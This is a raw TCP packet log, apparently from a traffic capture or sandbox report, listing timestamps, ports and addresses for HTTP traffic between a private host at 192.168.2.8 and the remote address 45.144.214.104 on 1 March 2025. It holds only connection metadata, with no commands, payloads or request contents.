Mar 1, 2025 14:42:23.143923998 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143935919 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143948078 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143953085 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.143976927 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.144263983 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144277096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144289970 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144318104 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.144335032 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144345999 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144349098 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.144352913 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144387007 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144398928 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.144401073 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144414902 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.144429922 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.144453049 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.145204067 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145215988 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145230055 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145242929 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145252943 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145262003 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.145303965 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.145742893 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145755053 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145771980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145783901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145783901 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.145797014 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145807028 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.145807981 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145821095 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145828009 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.145833015 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145845890 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.145853043 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.145889044 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.146578074 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146598101 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146610975 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146621943 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146634102 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146641970 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.146665096 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.146665096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146677017 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146688938 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146701097 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.146708965 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.146722078 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.147505045 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147517920 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147530079 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147542953 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.147564888 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147567034 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.147578001 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147592068 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147609949 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147613049 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.147623062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147659063 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.147665024 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.148257971 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.148447037 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148459911 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148471117 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148498058 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.148510933 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148523092 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148535013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148546934 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148555994 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.148557901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148570061 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.148577929 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.148597956 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.149375916 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.149389982 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.149401903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.149429083 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.149451017 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.236215115 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.236231089 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.236241102 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.236342907 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.273961067 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.273987055 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274003983 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274018049 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274018049 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274053097 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274058104 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274095058 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274106979 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274120092 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274132013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274143934 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274158955 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274187088 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274297953 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274334908 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274344921 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274385929 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274499893 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274516106 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274533987 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274538994 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274583101 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274599075 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274611950 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274622917 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274641991 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274660110 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274671078 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274682999 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274699926 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274724007 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.274758101 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274770021 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274780989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.274805069 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275156021 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275168896 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275182962 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275191069 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275194883 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275223017 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275232077 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275243998 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275255919 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275268078 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275300026 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275628090 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275644064 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275650978 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275661945 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275679111 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275686026 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275697947 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275712013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275717020 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275722980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275734901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275739908 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275746107 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.275765896 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.275798082 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.276141882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276154041 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276168108 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276185989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276196003 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.276199102 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276211023 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276221991 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276223898 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.276243925 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.276333094 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276345968 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276356936 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276367903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276372910 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.276387930 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276388884 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.276401043 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276412964 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276423931 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276433945 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.276436090 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.276453972 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.276485920 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.277192116 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277204990 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277218103 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277229071 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277241945 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277249098 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.277252913 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277266026 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277266979 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.277296066 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.277326107 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277338982 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277350903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277363062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277367115 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.277375937 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277388096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277391911 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.277400970 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277410984 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.277412891 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277426958 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.277436972 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.277481079 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.278064966 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278088093 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278107882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278119087 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278129101 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.278131008 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278145075 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278156996 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.278157949 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278208017 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.278243065 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278254032 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278266907 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278278112 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278289080 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.278300047 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278311968 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278312922 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.278325081 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278341055 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.278361082 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278364897 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.278373003 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.278425932 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.279006004 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279019117 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279031038 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279064894 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279079914 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279093027 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279093027 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.279093981 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.279104948 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279128075 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.279169083 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279181004 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279186964 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279194117 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279200077 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279232025 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.279283047 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.279299021 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279318094 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279335022 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279347897 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279359102 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.279395103 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.279954910 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279978037 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.279989004 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.280000925 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.280016899 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.280050993 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404243946 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404273033 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404325008 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404326916 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404360056 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404371023 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404396057 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404402971 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404408932 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404433012 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404479980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404491901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404505014 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404520988 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404536009 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404582977 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404593945 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404613972 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404625893 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404638052 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404665947 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404687881 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404700994 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404714108 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404723883 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404736042 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404738903 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404757977 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404782057 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404793024 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404804945 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404820919 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404834986 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404879093 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404891014 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404901981 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404913902 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.404938936 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.404968023 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405029058 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405040979 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405051947 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405061007 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405072927 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405080080 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405083895 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405096054 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405100107 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405116081 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405258894 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405272007 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405282974 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405294895 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405299902 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405308008 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405318975 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405327082 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405330896 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405343056 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405344963 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405355930 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405369997 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405379057 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405405998 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405550957 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405561924 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405572891 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405584097 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405591965 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405606985 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405611992 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405617952 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405630112 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405639887 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405642986 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405653000 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405664921 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405675888 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.405680895 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.405710936 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.410841942 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.410856009 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.410866976 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.410904884 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.410999060 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411010027 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411020994 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.411031961 CET	80	49704	45.144.214.104	192.168.2.8
